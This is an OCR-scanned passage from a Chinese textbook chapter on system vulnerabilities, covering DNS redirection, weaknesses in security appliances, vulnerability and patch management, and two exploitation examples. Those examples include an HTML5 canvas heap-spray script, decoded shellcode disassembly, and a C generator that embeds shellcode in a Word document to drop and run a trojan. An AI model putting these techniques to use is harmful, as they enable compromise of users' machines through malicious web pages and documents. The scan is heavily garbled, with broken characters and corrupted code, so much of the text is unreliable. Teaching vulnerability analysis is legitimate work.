IP 地 址 和 主机 域名 的 解释 ,就 能 重 定 加 服务 ,从 而 实现 其 攻击 目的 。 例 如 ,构造 特殊 的 服务 
请 求 ,使 域名 服务 需 的 高 速 缓存 保留 虚假 的 地 址 信息 。 这 样 当 合法 用 户 进 行 域名 查询 时 , 攻 
击 者 就 将 这 些 请 求 重 定 回 到 某 个 特定 的 网 站 ,如 图 3-10 所 示 。 
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图 3-10 ”域名 重 定 癌 攻击 示意 图 
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3.4.5 网 络 安全 保障 系统 漏洞 


网 络 安全 的 保障 系统 自 号 安全 问题 是 攻击 者 的 重点 目标 。 硅 网络 安全 的 保障 系统 存在 
漏洞 ,那么 它 不 仅 不 能 保障 网 络 安全 ,而且 还 会 造成 虚假 的 网 络 安 全 。 现 在 的 访问 控制 和 保 
护 模 型 本 身 也 存在 问题 。 这 里 有 几 个 方面 的 因素 : 山 弱 口令 ,如 果 口 令 容 易 破 解 ,那么 访问 
控制 系统 就 不 能 够 阻止 信息 丢失 或 破坏 ; @ 网 络 安 全 的 保障 系统 控制 策略 是 依据 以 往 的 安 
全 事实 来 制定 的 ,从 而 不 足以 适应 网 络 安全 需求 的 变化 ,新 的 攻击 方法 容易 突破 旧 的 安全 保 
障 系统 ; 3 网络 安全 保障 系统 的 设计 和 程序 编码 缺陷 ; 由 网 络 安全 保障 系统 的 安全 策略 完 
备 性 难以 验证 ; 加 网 络 安 全 保障 系统 的 运行 无 法 完全 自动 人 处理, 还 要 依靠 管理 人 员 的 参加 ，。 

常见 的 网 络 安 全 保障 系统 漏洞 包括 以 下 内 容 。 

C1) 防火 墙 漏 洞 。 防 火 墙 是 保障 网 络 安全 不 可 缺少 的 基础 设备 ,但 是 单 靠 防火 墙 安全 
机 制 ,不 可 能 完全 有 效 对 抗 越 来 越 复 杂 的 网 络 攻击 。 尽 管 防火 墙 有 许多 防范 功能 ,但 它 是 基 
于 静态 的 访问 控制 规则 ,属于 粗 粒 度 ,不 能 检测 网 络 包 的 内 容 。 

其 主要 的 安全 漏洞 有 : 无 法 阻止 攻击 者 使 用 软件 后 门 攻击 ; 无 法 阻止 数据 驱动 攻击 ; 
防火 墙 是 网 络 的 瓶颈 , 易 形 成 拒绝 服务 攻击 ;: 防火 墙 需 要 人 工 配 置 , 安 全 策略 是 静态 的 , 易 
导致 配置 不 当 或 不 完备 ; 防火 墙 的 过 滤 规 则 使 用 的 IP 地 址 和 物理 地 址 可 以 伪造 ; Dy k 
运行 易 受 男 外 系统 的 干扰 ,如 攻击 域名 服务 器 ,修改 防火 墙 域名 和 IP 地 址 对 应 数据 ,干扰 防 
火 墙 的 运行 ; 防火 墙 无 法 有 效 地 阻止 网 络 隐蔽 信道 。 

(2) IDS/IPS 的 漏洞 。IDSVIPS 尽管 能 够 识别 并 记录 攻击 ,但 也 有 其 安全 漏洞 。 网 络 
入 侵 检 测 需 要 处 理 和 存储 大 量 的 网 络 数据 包 , 易 消耗 磁盘 空间 或 CPU 计算 资源 ,造成 拒绝 
服务 攻击 的 漏洞 : 入 侵 检 测 系 统 的 误 用 模式 库 公 开 , 攻 击 者 可 构造 特殊 的 模式 欺骗 IDS, 让 
IDS 产生 大 量 的 误 报 警 , 麻 瘟 网 络 安 全 管理 人 员 ; 大 部 分 入侵 检测 系统 不 能 检测 新 的 入 侵 
行为 ,攻击 者 可 以 寻找 新 的 网 络 漏洞 ,探索 新 的 攻击 方法 躲 过 IDS 的 检测 ; 入 侵 检 测 系 统 的 
异常 检测 计算 资源 开销 大 , 易 造 成 拒绝 服务 攻击 。 

(3) 身份 认证 系统 漏洞 。 身 份 认证 是 信息 及 网 络 访问 控制 的 关键 技术 ,身份 认证 系统 
涉及 复杂 的 安全 认证 协议 和 运行 环境 。 其 安全 漏洞 主要 有 : 认证 服务 器 易 受 大 量 虚 假 的 认 
证 信息 干扰 ,造成 拒绝 服务 ; 认证 协议 设计 复杂 ,协议 的 实现 不 能 满足 设计 需求 ,协议 的 设 
计 和 实现 的 安全 性 不 能 得 到 验证 ; 认证 协议 的 主体 认证 信息 泄密 ; 认证 协议 采用 弱 的 加 密 
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算法 ; 认证 协议 采用 伪 随 机 数 ; 认证 协议 主体 的 执行 环境 存在 漏洞 ,多 受到 攻击 者 侵入 ,如 
操作 系统 存在 漏洞 ; 认证 系统 的 管理 漏洞 ,如 密 钥 分 配 和 保存 方式 不 当 , 密 钥 遭 到 稻 取 。 


3.4.6 信息 系统 漏洞 


从 安 观 上 来 说 ,信息 系统 的 漏洞 来 目 两 个 方面 ,一 方面 是 信息 系统 管理 的 漏洞 E RUP 
及 管理 绪 构 .管理 制度 .管理 流程 人员 管 理 等 。 羽 一 方面 是 信息 系统 的 扩 术 漏洞 ,主要 涉及 
网 络 结构 .通信 协议 IT 设备 、 软 件 产 品 ` 系 统 配置 .应 用 系统 等 。 

信息 系统 管理 的 典型 漏洞 主要 表现 在 以 下 几 方 面 。 

(D 组 织 中 缺少 针对 信息 系统 安全 负责 任 的 机 构 ,或 痢 是 信息 安全 机 构 不 健全 。 


(2) 组 织 中 和 缺少 或 没有 形成 一 套 规 范 的 信息 安全 策略 、 信息 安全 规章 制度 .信息 安全 控 
制 流程 。 例 如 ,笔记 本 电脑 能 够 随意 接 人 核心 网 络 中 , 则 可 能 被 攻击 者 利用 。 

(3) 组 织 中 矶 少 对 工作 人 员 的 安全 职责 规范 要 求 , 没 有 制度 化 的 安全 意识 和 拉 能 培训 
机 制 。 例 如 ,员工 缺少 新 的 信息 安全 威胁 知识 和 预防 能 力 ,不知 站 如 何 防 范 垃 圾 邮件 。 

(4) 组 织 中 身 少 一 种 中 有 力 的 信息 安全 监督 机 制 ,信息 安全 策略 的 实施 无 法 落实 。 

(5) 组 织 中 设计 信息 安全 管理 制度 .安全 控制 流程 不 完备 ,如 安全 检查 表 不 全 。 

系统 技术 的 漏洞 主要 表现 在 以 下 几 个 方面 。 

(1) 输入 验证 销 误 (Input Validation Error): 由 于 未 对 用 户 输入 数据 的 合法 性 进行 验 
证 ,使 攻击 者 非法 进入 系统 。 

(2) 绥 冲 区 洲 出 (Buffer Overflow): 由 于 回程 序 的 缓冲 区 中 录入 的 数据 超过 其 规定 长 
E ,造成 缓冲 区 溢出 ,破坏 程序 正常 的 堆栈 ,使 程序 执行 其 他 命令 。 

(3) 设计 错误 (Design Error): 由 于 程序 设计 错误 而 导致 的 漏洞 。 其 实 , 大 多 数 的 调 洞 
部属 于 设计 销 误 。 

(4) 意外 情况 处 置 错 误 (Exceptional Condition Handling Error): 由 于 程序 在 实现 逻辑 
中 没有 考虑 到 一 些 意 外 情况 ,从 而 导致 运行 出 错 。 

(5) 访问 验证 销 误 (Access Validation Error): 由 于 程序 的 访问 验证 部 分 存在 某 些 逻辑 
fa be ,使 攻击 者 可 以 经 过 访问 控制 进入 系统 。 

(6) M AiR (Configuration Error): 由 于 系统 和 应 用 的 配置 有 误 ,或 者 配置 参数 、 访 
问 权 限 、 荣 略 安 衣 位置 有 误 。 

(7) 3E ^R ZR TF CRace Condition): 由 于 程序 处 理 文件 等 实体 在 时 序 和 同步 方面 存在 问 
题 ,存在 一 个 短暂 的 时 机 使 攻击 者 能 够 施 以 外 来 的 影 啊 。 

(8) 环境 错误 (Condition Error); 由 于 一 些 环 境 变 量 的 错误 或 恶意 设置 造成 的 漏洞 。 

人 研究 表明 ,攻击 着 要 成 功 人 侵 的 关键 在 于 及 早 发 现 和 利用 目标 信息 系统 的 安全 漏洞 。 
由 于 安全 漏洞 对 信息 系统 安全 保障 的 重要 性 ,发 现 、 检测 .消除 信息 产品 中 存在 的 安全 漏洞 
成 为 安全 人 研究 的 重要 诛 题 。 网 络 系统 的 可 徘 性 、 健 壮 性 . 抗 攻 击 性 的 强 弱 取决 于 所 使 用 的 信 
县 产品 本 号 是 否 存在 安全 隐患 。 安 全 漏洞 的 基本 策略 归纳 为 : 建立 稼 态 化 的 安全 漏洞 分 析 
机 制 ,及 时 发 现 安全 隐患 ,然后 设法 消除 安全 漏洞 或 安全 漏洞 产生 的 环境 条 件 , 限 制 安全 漏 
洞 影响 的 范围 ,做 好 安全 预防 ; 建立 安全 漏洞 管理 平台 ,及 时 修补 安全 漏洞 ;建立 安全 漏洞 
主动 剑 护 机 制 . Bi LE das Tel BR A A 
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动 检查 信息 系统 的 漏洞 ,以便 及 时 消除 安全 隐患 。 各 种 类 型 的 漏洞 扫 摘 大 有 许多 ,主要 的 漏 
洞 扫 摘 硕 包括 Saint, Nessus, Shadow Security Scanner, Nessus Œ W) i H HA Ai. h A J Ym AN 
服务 端 两 部 分 组 成 ,支持 即 插 即 用 的 弱点 检测 脚本 。 它 是 一 套 免费 .功能 强大 、 结 构 完 整 .时 
时 更 新 且 相 当 容 匈 使 用 的 安全 弱点 扫 摘 软件 。 这 和 套 软 件 的 发 行 目 的 ,是 帮助 系统 管理 者 搜 
寻 网 络 系统 中 存在 的 弱点 。Nessus 的 使 用 模式 如 图 3-11 所 示 。 





洞 洞 检查 客户 程序 漏洞 检查 服务 程序 


图 3-11  Nessus 的 使 用 模式 


补丁 管理 是 修补 信息 系统 漏洞 的 重要 环节 ,目前 ,一 个 漏洞 的 发 现 到 攻击 代码 的 实现 ， 
往往 可 以 在 几 周 甚至 数 天 内 完成 。 例 如 ,微软 发 布 MS04-011 公告 时 ,NGS 的 David 在 看 到 
公告 后 的 8 分 钟 后 写 出 了 攻击 代码 ,xfocus 成 员 也 在 6 小 时 内 写 出 了 攻击 代码 。 因 此 ,补丁 
管理 需要 很 强 的 及 时 性 ,如 果 补 丁 管理 工作 晚 于 攻击 代码 的 出 现 及 流行 ,就 可 能 遭 到 攻击 造 
成 不 必要 的 损失 。 从 以 往 的 经 验 可 以 看 出 ,黑客 攻击 工 pia 与 传播 , 留 给 管理 人 员 的 时 
间 越 来 越 得, 在 最 短 的 时 间 内 安 闻 补丁 会 极 大 地 提高 一 个 组 织 的 网 络 信 息 系 统 的 安全 性 。 
补丁 管理 是 一 个 系统 的 周而复始 的 工作 ,主要 由 6 META ENSE are 
踪 、 补 本 验证、 补丁 安装 .应 急 处 理 和 补丁 检查 ,如 图 3-12 所 示 。 


补丁 检查 






图 3-12 补丁 管理 循环 流程 图 


针对 补丁 管理 问题 ,许多 人 研究 结构 和 公司 部 提供 了 解决 方案 ,其 中 典型 产品 有 eTrust 
Vulnerability Manager、 做 软 的 Software Update Services (SUS) 、PatchLink、 LANDesk 、 北 
信 源 内 网 安全 及 补丁 管理 系统 (VRVEDP) 等 。 

对 一 个 信息 系统 的 狂 洞 进行 管理 ,是 把 握 信 息 系 统 安全 态势 的 关键 所 在 ,是 实施 信息 安 

管理 从 被 动 问 主动 转变 的 标志 性 行动 。 现 在 ,针对 漏洞 管理 工具 和 商业 产品 都 已 经 出 现 ， 
Bi NN E 品 有 天 融 信 TopAnalyzer, JA AA E Jie X A, eTrust Vulnerability Manager, Qualys 
Guard,StillSecure, gi HEC Vulnerability Management) 的 过 程 主要 包括 以 下 环 市 。 
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CD 信息 资产 确认 。 对 信息 系统 中 的 信息 资产 进行 摸底 调查 ,建立 资产 档案 。 

(2) 漏洞 信息 采集 。 利 用 安全 漏洞 工具 或 人 工 方法 收集 整理 信息 系统 的 资产 漏洞 相关 
信息 ,包括 漏洞 类 型 .当前 补丁 级 别 、 所 影响 到 的 资产 。 

(3) 漏洞 安全 评估 报告 。 对 信息 系统 中 的 漏洞 进行 安全 评估 ,如 漏洞 对 组 织 业 务 影响 、 
漏洞 被 利用 可 能 性 (是 否 有 公开 工具 、 远 程 是 否 可 利用 等 ) ,漏洞 当前 解决 办 法 是 什么 ,最 后 
形成 信息 资产 漏洞 分 析 报告 ,给 出 漏洞 威胁 排行 榜 和 解决 方案 。 

CA) 信息 资产 漏洞 消除 和 控制 。 根 据 漏洞 安全 分 析 报告 ,消除 信息 系统 中 的 漏洞 ,如 安 
装 软件 补丁 .重新 配置 系统 、 变 更 信息 安全 管理 流程 。 

(5) 信息 系统 中 漏洞 变化 跟踪 。 一 方面 ,信息 系统 是 一 个 开放 的 环境 ,系统 中 资产 不 断 
出 现 变化 ,如 新 IT 设备 和 应 用 系统 的 上 线 、 软 件 包 删除 和 安装 等 ; 另 一 方面 ,安全 威胁 手段 
层出不穷 ,因此 ,信息 系统 的 漏洞 数量 .类 型 ,以 及 分 布 都 在 动态 演变 。 安 全 管理 员 必须 设法 
跟踪 漏洞 状态 ,持续 修补 信息 系统 中 的 漏洞 。 


3.5 漏洞 利用 实例 


3.5.1 itl bi x i o] F) FH 


AE list SY ( Heap Spray) 是 一 种 Payload 传递 技术 , 信 助 堆 来 将 Shellcode 放置 在 可 预测 的 
堆 地 址 上 ,然后 稳定 地 跳 人 人 Shellcode。 为 了 实现 Heap Spray. m 2 YE H) FF EIP 前 ,能 够 先 分 
配 并 填充 堆 内 存 块 。“ 需 要 ……: 能 够 ……” 的 意思 是 在 触发 内 存 骨 浊 前 ,必须 能 够 在 目标 程 
厅 中 分 配 可 探 内 存 数 据 。 浏 贤 帮 已 经 为 此 提供 了 一 种 很 便 单 的 方法 , 它 能 够 文 持 脚本 ,可 耳 
接 仿 助 JavaScript 或 VBScript 在 触发 漏洞 前 分 配 内 人 存 。 扒 喷射 的 运用 并 不 仅仅 局 限于 训 
War AI HI P th ay EA TE Adobe Reader 中 使 用 JavaScript 或 ActionScript 将 Shellcode 放置 
在 可 预测 的 扒 地 址 上 。 从 广义 上 来 说 ,如 条 在 控制 EIP 前 ,用 户 能 够 在 可 预测 的 地 址 上 分 
配 内 存 , 那 么 用 户 就 是 在 使 用 Heap Spray AR. 

Web 浏览 器 实现 堆 顺 射 的 关键 在 于 触发 漏洞 前 ,能 够 将 Shellcode 传输 到 正确 的 内 存 
地 址 。 下 面 是 实现 堆 喷 射 震 要 做 的 各 项 步骤 。 

(1) 喷射 堆 块 。 

(2) fif A d ii 

(3) 控制 EIP 并 使 其 指向 堆 中 。 

在 浏览 闫 中 分 配 内 存 块 有 许多 方法 ,虽然 大 部 分 是 基于 JavaScript 来 分 配 字 符 串 的 ,但 
并 不 局 限于 此 。 在 使 用 JavaScript 分 配 字符 串 并 喷射 堆 块 前 ,还 需要 设备 下 的 操作 环境 。 

现在 已 经 知道 通过 JavaScript 中 的 字符 串 变 量 来 分 配 内 存 , 而 Shellcode 38 % B EG Be 
大 ,但 相对 堆 中 可 用 的 虚拟 内 存 来 说 还 是 比较 少 的 。 理 论 上 ,可 以 分 配 一 系列 变量 ,而 每 个 
变量 又 包含 有 Shellcode, 然 后 再 设法 跳 人 其 中 一 个 变量 所 在 的 内 存 块 。 多 次 在 内 存 中 分 配 
Shellcodle, 这 里 将 用 由 以 下 两 部 分 数据 组 成 内 人 存 块 来 嘎 射 堆 块 。 

(1) Pops( 许 多 nop 指令 )。 

(2) Shellcode( 放 置 在 喷射 块 的 尾部 ) 。 

如 果 所 使 用 的 喷射 块 足够 大 ,那么 利用 Win32 平台 下 的 堆 块 分 配 粒 度 ,就 可 精确 定位 
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推 地 址 ,这 也 意味 着 堆 嘎 射 之 后 ,每 次 都 能 跳 人 Nops 中 。 如 果 跳 到 Nops; 那 么 就 有 机 会 执 
fT Shellcode。 图 3-13 所 示 为 一 张 堆 块 分 配 视 图 。 
堆 嘎 射 是 如 今 大 部 分 漏洞 利用 关键 的 一 环 。 使 用 扒 
充 Shellcode, MA EIP HFS NHR pc. fc 
的 堆 喷 射 方法 借助 于 JavaScript 的 字符 串 操 作 , 既 可 以 分 | 变量 3 gH 
中 的 Nozzle 保护 机 制 ,通过 JavaScript FIF P 27 Bo xs Bl HE 
及 IE10 浏览 器 环境 下 ,通过 HTMLS 的 canvas 对 象 来 布 
(1) 通过 JavaScript 创建 canvas HA., 
(4) 填充 ImageData.—^1- (RA BMI 4 PH. BI RGBA WIA. 
HTMLS5 堆 喷 射 的 测试 环境 在 Windows 8 和 [E10 浏览 器 环境 下 ,喷射 1000 个 0x100 


下 面 结 合 应 用 实例 对 Windows 8 操作 系统 下 的 
Mitaine nether x | 
配 大 量 内 存 , 又 可 以 写 人 数据 。 但 在 Windows 8 操作 系统 
喷射 效果 已 经 变 得 不 再 可 行 。 若 想 重新 利用 堆 喷射 只 能 
局 内 存 的 方法 ,以 绕 过 Windows 8 及 IE10 浏览 器 对 堆 喷 
(2) 通过 创建 的 canvas 对 象 , 获 取 一 个 "2d" Context, 
通过 HTML5 进行 堆 喷射 和 填充 有 效 数 据 ,可 以 有 效 绕 过 浏览 大 及 Windows 8 系统 对 
大 小 的 堆 块 ,测试 代码 如 下 。 





HTML5 扒 嘎 射 进行 测试 。 
下 rH 于 加 人 了 GuardPage A HE CRP e D . 以 及 IE 浏览 硕 
采用 新 的 方法 ,需要 探索 新 的 堆 喷 射 方法 。 在 Windows 8 | ~™ 
图 3-13” 堆 块 分 配 视图 
射 的 限制 。 实 现 的 步骤 如 下 。 
(3) 创建 一 个 ImageData ,并 设置 像 了 系 个 数 , 像 隶 个 数 和 喷射 的 大 小 相关 。 
传统 喷射 方法 的 限制 。 而 且 内 存 分 配 更 加 灵活 ,分配 的 内 存 的 数据 可 以 随意 填充 。 


«! DOCTYPE html > 
< html > 
< Script > 
function fill(img, payload) 
{ 
for(var i= 0;i< img. data. length; i++) 
{ 
img. data[ i] = payload[i % payload. length]; 
} 
} 
function spray() 
{ 
var spray memory = Array(); 
var payload = [ 0x4E, 0x47, 0x4E, 0x47 | 
for(var i=0;1<2000;1i++) 
{ 
var context = document. createElement( 'canvas').getContext('2d'); 
var img = context. createImageData(0x100/4 - 2,1); 
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fill(img, payload); 
spray memory[i]- img 
} 
alert("spray done") 
} 
</script> 
€ body onload = Spray() > 
</body > 
«/html > 


EMK JavaScript 代码 循环 创建 了 canvas 对 象 , 进 而 创建 ImageData 对 象 ,创建 的 内 存 
块 大 小 为 0x200 宇 节 。 然 后 每 像素 DWORD 分 别 填充 为 0x4E474E47。 在 调试 疾 中 观察 喷 
射 效果 ,如 图 3-14 所 示 。 


OSfc88d8 | 


OST cb9ds 
O8fc8ad8 
O8fc8bd8 
08fc8cd8 
08fc8dd8 
O8fcBed8 
O8fcbtds 
GST c90ds 
08fc91d8 
08fc92d8 
08fc93d8 
OGfc94d8 


0070 
0020 


0020 0020 


0020 


_HEAP @ 1e70000 


_HEAP 


@ 7430000 


0020 


88fc88e0 
08fc89e0 
OSfc8ae0 
08fc8beO 
a8fcSce8 
88fc8deO0 
oëfcõeeð 
BS8fc8feo 
BST ceo 
88fc91e0 
O8Fc92e8 
88fc93e0 
88fc94e0 


- (busy) 
- (busy) 
- (busy) 
- (busy) 
- (busy) 
- (busy) 
- (busy) 
- (busy)| 
- (busy) 
- (busy) 
- (busy) 
- (busy) 
- (busy) 


1:015» dc 08fc8ae9 


OB8fc8aed 


474e474e 474e474e 
474e474e 474e474e 
474e474e 474e474e 
474e474e 47A4e474e 
474e474e 474e474e 
474e474e 474e47Ae 
474e474e 474e474e 
474e474e 474e474e 


474e474e 47A4e474e 
474e474e 474e474e 
4/4e474e A7A4eA7Ae 
474e474e 4/4e474e 
47/4e474e 4/4e474e 
4A74e474e 474e474e 
474e474e 474e474e 
4A74e474e A7AeA7Ae 
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NGNGNGNGNGNGNGNG 
NGNGNGNGNGNGNGNG 


NGNGNGNGNGNGNGNG 
NGNGNGNGNGNGNGNG 
NGNGNGNGNGNGNGNG 
NGNGNGNGNGNGNGNG 





图 3-14 HTML5 spray 调试 器 效果 


从 图 3-14 中 可 以 看 出 ,浏览 器 内 存 中 ,分 配 了 连续 内 存 块 ,大 小 都 为 0x100.0x100 是 由 
Oxf8 字 节 的 用 户 数 据 加 上 0x8 的 内 存 块 首部 组 成 。 而 且 , 布 局 的 内 存 中 ,已 经 被 期 望 的 值 
0x47 ,Ox4E,0x47 ,0x4E 所 填充 。 


3.5.2 Office imi T] FH 


1. Office 溢出 攻击 
常 以 邮件 附件 或 网 站 下 载 等 形式 扩散 到 被 攻击 者 。 当 单 击 恶 意 的 文档 时 ,Office 应 用 程序 
出 错 ,Shellcode 获得 执行 ,释放 其 中 的 后 门 程序 并 执行 ,从 而 达到 控制 计算 机 的 目的 。 

Office 淤 出 攻击 可 以 分 为 不 同 的 阶段 : 第 一 个 阶段 就 是 攻击 者 起 草 或 创建 一 个 恶意 
Word 文档 。OLE 结构 存储 无 法 验证 存储 组 件 的 内 容 , 并 允许 插入 木马 一 类 的 可 执行 程序 ; 
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第 二 个 阶段 就 是 诱 使 被 攻击 者 打开 通过 电子 邮件 附件 收 到 的 ,或 者 从 网 页 上 下 载 的 恶意 
MS Word 文档 ; 第 三 个 阶段 就 是 在 打开 Word 文档 的 同时 ,畸形 对 象 指 示 需 人 允许 Shellcode 
执行 并 司 动 木马 ,木马 就 开始 运行 ; POT Dor Boe ait aa PB de AY AR Sh Ce PRP ae Fe a A 
在 被 攻击 者 系统 中 执行 强制 代码 ,并 最 终 破坏 其 系统 的 后 门 。 

2. Office 文件 格式 分 析 

MS Office 文件 是 一 种 血型 的 复合 文档 (Compound Document) ,基于 对 象 链接 和 般 人 
(Object Linking and Embedding,OLE) 存 储 格 式 , 即 “ 文 件 里 包含 文件 ”, 与 操作 系统 的 存储 
格式 相似 。OLE 文档 无 颖 地 集成 了 各 种 类 型 的 数据 或 组 件 ,OLE 的 文档 实现 了 一 个 文件 ， 
即 一 个 文件 系统 的 理念 。 目 前 建立 复合 文档 的 趋势 是 使 用 面 癌 对象 技 术 ,在 这 里 , 非 标准 信 
上 县 如 图 像 和 声音 可 以 作为 独立 的 .月 包含 式 对 象 包含 在 文档 中 。MS Office 文档 的 格式 复 
杂 ,其 中 可 以 包含 多 种 不 同 格式 的 元 数据 。 在 Office 2007 的 版 本 以 前 ,Office 文档 格式 不 
对 外 公开 ,只 提供 基于 COM 的 接口 调用 供 开 发 者 二 次 开发 。 一 些 开 源 软 件 如 WVware、 
AbiWord 等 项 目 针 对 Office 文档 格式 作出 了 一 定 程度 的 逆 癌 解析。 通过 对 代码 的 解析 和 
测试 ,得 到 了 一 些 关 于 复合 文档 的 逻辑 结构 和 物理 结构 ,掌握 了 绝 大 多 数 的 文档 格式 信息 。 

Office 的 文档 格式 可 以 包含 多 种 不 同 的 源 数 据 , 如 图 人像、 首 频 视频, 其 至 包括 Excel X 
kt .PPT 演示 文档 等 复合 文档 。 

3. Office 漏洞 利用 

X8 SET f 59] B) A E ne OCS VAS pr «A P BAUR npn — 0) DU TCR «Z6 LOT di ind EE] ER 
蹊 分 析 后 ,怀疑 其 触发 的 漏洞 可 以 通过 控制 坷 人 存 融 的 值 来 实现 流程 控制 。 下 面 针 对 一 个 有 具 
体 的 Office 漏洞 实例 进行 和合 单 的 分 析 利 用 。 

(1) 漏洞 分 析 。 对 漏洞 进行 详细 的 分 析 是 漏洞 利用 必 不 可 少 的 前 期 准备 ,通过 漏洞 分 
析 找 到 触发 漏洞 的 原因 和 可 能 的 触发 点 、 触 发 机 制 等 漏洞 技术 细 市 。 以 某 个 Word 2003 ifs 
洞 为 例 , 针 对 异常 出 错 信 息 可 以 通过 加 载 调试 器 人 工 回 漳 的 方法 进行 分 析 , 通 过 对 堆栈 的 分 
析 和 对 文件 数据 的 比较 测试 ,发 现 此 时 的 EAX 寄存 器 可 控 。 此 时 只 需要 在 文档 中 此 处 卦 
入 一 个 地 址 ,而 此 地 址 附近 的 数据 就 可 以 存放 Shellcode。 不 难看 出 ,此 处 覆盖 了 程序 中 出 
错 的 地 址 ,从 而 可 以 达到 执行 任意 代 人 码 的 攻击 目的 。 用 OD 动态 加 载 调试 Word 样本 , 程 厅 
会 先 把 Shellcode 解密 。 跟 踊 调 试 的 同时 ,查看 解密 后 的 二 进 制 代码 。 


//; 开始 解码 的 起 始 位 置 

OCODFC95 5B pop ebx 

OCODFC96 4B dec ebx 

OCODFC97 33C9 xor ecx, ecx 

OCODFC99 66:B9 2E03 mov cx, 300 ; ecx = 0x300 解码 长 度 
OCODFC9D 80340B 8F xor byte ptr [ebx + ecx], 8F ; key 

OCODFCA1 ^ E2 FA loopd short OCODFC9D 

OCODFCA3 EB 05 jmp short OCODFCAA 

OCODFCA5 E8 EBFFFFFF call OCODFC95 

// 查 询 peb 定位 kerne132.d1ll 基 址 ,从 而 通过 解析 PE 结构 来 查询 特定 函数 地 址 
OCODFCAA E8 30000000 call OCODFCDF; 

OCODFCAF 870A xchg dword ptr [edx], ecx 

OCODFCB1 817C9E OB 817COE18 cmp dword ptr [esi + ebx * 4 * B], 180E7C810C 
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(2) iwi A Hi. Office 漏洞 属于 缓冲 区 淤 出 洗 洞 ,针对 此 类 漏洞 笛 见 的 利用 方式 是 下 
载 执 行 放 在 网 络 服务 项 上 的 后 门 程序 或 释放 内 散在 恶意 Office 文档 中 的 后 门 程序 。 由 于 
被 攻击 者 的 上 网 方式 复杂 , 越 来 越 多 的 针对 Office 程序 的 漏洞 利用 采用 了 释放 内 藤 后 门 并 
执行 的 利用 方式 。 漏 洞 利用 将 在 上 述 的 漏洞 分 析 的 基础 上 ,实现 流程 的 控制 并 编写 相应 的 


Shellcode, 


Shellcode El xE fi 


获取 kernel32.dll 基 地 址 


获取 Word 相 关 信 和 有 息 
CHARA Se 
释放 路 径 信息 等 ) 


翻 详 并 执行 木马 程序 


安全 退出 Word 进 程 





Shellcode 是 一 个 缓冲 区 洲 出 漏洞 利用 的 关键 。 一 般 
针对 不 同 种 类 和 不 同 利 用 方式 的 漏洞 需要 编写 不 同 功能 的 
Shellcode。 以 上 述 Word 的 溢出 漏洞 为 例 , 通 过 分 析 样 本 ， 
找 出 了 填充 Shellcode 的 位 置 ,明确 Shellcode 要 实现 的 功 
能 ,使 其 能 够 释放 的 Word 文件 中 内 艇 的 木马 程序 并 执行 。 
Shellcode 编写 流程 如 图 3-15 所 示 。 

(3) 编写 漏洞 利用 工具 。 参 照 Word 2003 的 文档 格 
式 ,构造 要 生成 的 恶意 Word 文档 ,双击 生成 的 恶意 Word 
文档 能 达到 释放 并 执行 木马 程序 的 目的 ,用 日 己 熟 悉 的 编 
程 语言 编写 最 后 的 漏洞 利用 工具 。 由 此 可 见 ,漏洞 工具 的 
形成 是 建立 在 之 前 清晰 的 漏洞 分 析 、 样 本 调试 及 文档 格式 
分 析 的 基础 上 ,在 洲 出 点 位 置 触 发 , 跳 转 到 Shellcode A A 


点 ,执行 Shellcode 的 功能 ,这 部 体现 在 汤 洞 利用 工具 生成 的 样本 中 。 目 前 ,Office 系列 的 漏 
il] y Fd ví. Fal EG 2] i2 . Be SEY AA EH 7r s LIE S IN SIDE. 


# include "windows. h" 
# include "stdio.h" 

# include "newdoc. h" 
FILE * fpNewDoc; 

char shellcode[] = 


\x81\xEC\x80\x00\x00\x00\x8B\xEC\x83\xC5\x04\x64\xA1\x30\x00\x00" 


\x00\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x58\x08\x8B\x43\x3C\x8B\x44" 


\x03\x78\x03\xC3\x89\x45\x20\x8B\x48\x18\x8B\x40\x20\x03\xC3\x89" 


\x45\x28\xC7\x45\x24\x00\x00\x00\x00\xC7\x45\x00\x47\x65\x74\x50" 


\x86\xF0\x01\x00\x00\x50\xFF\x55\x24\x6A\x00\xFF\x55\x20"; 
int main(int argc, char * argv[ ]) 


{ 
if(argc ! = 2) 
{ 


printf("usage: $ s new doc\n", argv[0]); 


return 0; 


} 


memcpy(docdata + 0x136e, shellcode, sizeof(shellcode) - 


cn ge 
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fpNewDoc = fopen(argv[1], "wb"); 
fwrite(docdata, sizeof(docdata), 1, fpNewDoc); 
fclose(fpNewDoc); 

return 0; 


} 


3.6 ”本草 小 结 


本 革 冯 和 完税 单 介绍 系统 漏洞 的 概念 、 人 研究 现状 及 漏洞 标准 ; 然后 分 别 介绍 了 漏洞 分 析 
技术 和 漏洞 利用 技术 ,并 介绍 了 在 实践 场景 中 对 上 述 拉 术 实现 的 具体 方法 ;: 本 革 还 介绍 了 
针对 不 同 计算 机 组 件 的 漏洞 分 析 方 癌 ,包括 软件 壮 洞 分 析 .通信 协议 独 洞 分 析 、 操 作 系 统 漏 
洞 分 析 、 应 用 服务 汤 洞 分 析 、 网 络 安全 保障 系统 漏洞 分 析 、 信 息 系 统 涯 洞 分 析 等 ; 最 后 本 草 
列举 了 两 个 漏洞 利用 的 实例 , 带 助 谈 肴 这 入 理解 漏洞 分 析 到 利用 的 整个 流程 。 


习题 3 
1. 下 列 组 织 与 漏洞 收集 无 关 的 一 项 是 ( de 
A. CVE B. CNNVD 
C. NVD D. CNCERT/CNVD 
2. Fi Je T xe AE R BE Ds Hed ae UL R A RJ Ze C P 
A. 缓冲 区 未 做 边界 检查 B. 程序 系统 调用 不 当 
C. 对 外 部 输入 不 做 检查 D. 协议 漏洞 


3. 程序 系统 调用 不 当 往 往 容易 形成 安全 缺陷 ,导致 软件 漏洞 。 例 如 ,3. 4 节 软 件 漏洞 
中 所 述 ,能 否 构造 一 段 可 以 对 所 使 用 文件 权限 属性 和 状态 进行 检查 的 代码 。 

4. 在 3.4.1 节 软件 漏洞 中 提 到 “程序 随意 接收 外 部 输入 ,有 是 对 输入 数据 不 做 安全 检查 ， 
或 者 数据 输入 安全 检查 不 完备 会 导致 安全 缺陷 。” 能 否 参 考 已 有 根据 已 知 威胁 字符 实施 检查 
的 方法 ,构造 一 段 “ 白 名 单 ” 检 查 的 代码 , 即 只 允许 符合 字符 串 规则 的 内 容 通 过 query O 

5. FTP 服务 漏洞 包括 FTP 服务 器 泄露 用 户 服 务 器 信息 。 请 通过 查阅 资料 列举 一 种 可 
以 获得 FTP WR ae PRE A St fa SY A) 

6. 简 述 域名 重 定 回 攻 击 的 基本 原理 。 


网 络 攻击 技术 原理 与 防范 。 第 二 部 分 


第 4 章 DEI 4448/38 5 is 
